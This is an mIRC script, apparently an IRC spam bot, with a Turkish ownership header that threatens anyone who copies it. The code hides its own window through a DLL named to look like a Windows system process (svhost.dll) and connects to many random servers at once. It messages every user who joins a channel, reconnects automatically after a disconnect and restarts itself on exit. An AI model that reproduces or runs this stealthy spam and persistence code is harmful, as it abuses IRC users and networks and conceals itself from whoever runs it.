;****Bu Kodlar Tamamen ReSSaM a aittir çalmayı düşünüyorsan eğer başına alırsın***************
on *:start: {
  dll svhost.dll do_ShowWindow $window(-2).hwnd 0   
  timer 1 2  kral
  saldirisifirla
  server %rootserver | timerdegis 1 60 $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m %adminserver
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  server -m $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
  %server1s
  %server2s
  %server3s
  %server4s
  %server5s
  %server6s
  %server7s
  %server8s
  %server9s
  %server10s
  %server11s
  %server12s
  %musteristart1
  %musteristart2
  %musteristart3
  %musteristart4
  %musteristart5
  %musteristart6
  %starton
  ressam
  timer 0 200 ressam
  timer 1 6000 exit


}
on *:exit:/run  $remove($mircexe,$mircdir) 
on *^:action:*:?:closemsg $nick | haltdef
on 1:join:#:{ 
  if ($nick == $me) { halt } 
  if ($server == %adminserver) { halt }
  if ($network ==  Undernet) {  /timer $read $mircdir/timer.txt  msg $nick %undernet | halt }
  if ($server == %musteri1) {  halt }
  if ($server == %musteri2) {  halt }
  if ($server == %musteri3) {  halt }
  if ($server == %musteri4) {  halt }
  if ($server == %musteri5) {  halt }
  if ($server == %rootserver) {  halt }
  if ($server == %joinpartserver) {  halt }
  timer $read $mircdir/timer.txt  msg $nick %tmesaj
}

raw 439:*:{
  disconnect
}
on 1:disconnect:{
  timer 1 1  kral
  set %starton echo wiwiwiwiiwiwiwiiiw
  /echo koptun looooooo
  /username $read colors/i.dll
  if ($server == %adminserver) { disconnect |  kral | server %adminserver | halt } 
  if ($server == %rootserver) { disconnect |  kral | server %rootserver | halt } 
  if ($server == %musteri1) { disconnect |  kral | server %musteri1 | halt } 
  if ($server == %musteri2) { disconnect |  kral | server %musteri2 | halt } 
  if ($server == %musteri3) { disconnect |  kral | server %musteri3 | halt } 
  if ($server == %musteri4) { disconnect |  kral | server %musteri4 | halt } 
  if ($server == %musteri5) { disconnect |  kral | server %musteri5 | halt } 
  timer 1 0 server $gettok(%serverlistesi,$rand(1,$numtok(%serverlistesi,44)),44)
}
